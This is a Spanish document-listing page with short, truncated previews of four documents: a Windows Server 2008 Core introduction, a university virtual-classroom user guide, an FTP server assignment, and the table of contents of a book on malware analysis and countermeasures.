WINDOWS SERVER 2008 CORE INTRODUCCION Una de las características mas importantes de Windows Server 2008, es la instalación como Server Core. Este tipo de instalación nos permite tener lo estrictamente
Más detallesServicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación. Guía de usuario del servicio de Aula Virtual
Vicerrectorado de Tecnologías de la Información y la Guía de usuario del servicio de Aula Virtual Última Actualización 14 de Enero de 2019 Tabla de contenido 1.- INTRODUCCIÓN... 3 2.- ACCESO AL SERVICIO...
Más detallesPRACTICA FINAL. Diseño e implementación de un servidor FTP básico y cliente ftp. Protocolo FTP-RC
PRACTICA FINAL Diseño e implementación de un servidor FTP básico y cliente ftp Descripción de la práctica Protocolo FTP-RC Se propone desarrollar un servidor FTP básico iterativo (sólo atiende a un cliente
Más detallesSeguridad informática y Malwares Análisis de amenazas e implementación de contramedidas
Identificación de un malware 1. Presentación de los malwares por familias 9 1.1 Introducción 9 1.2 Backdoor 10 1.3 Ransomware y locker 11 1.4 Stealer 12 1.5 Rootkit 13 2. Escenario de infección 14 2.1
Más detalles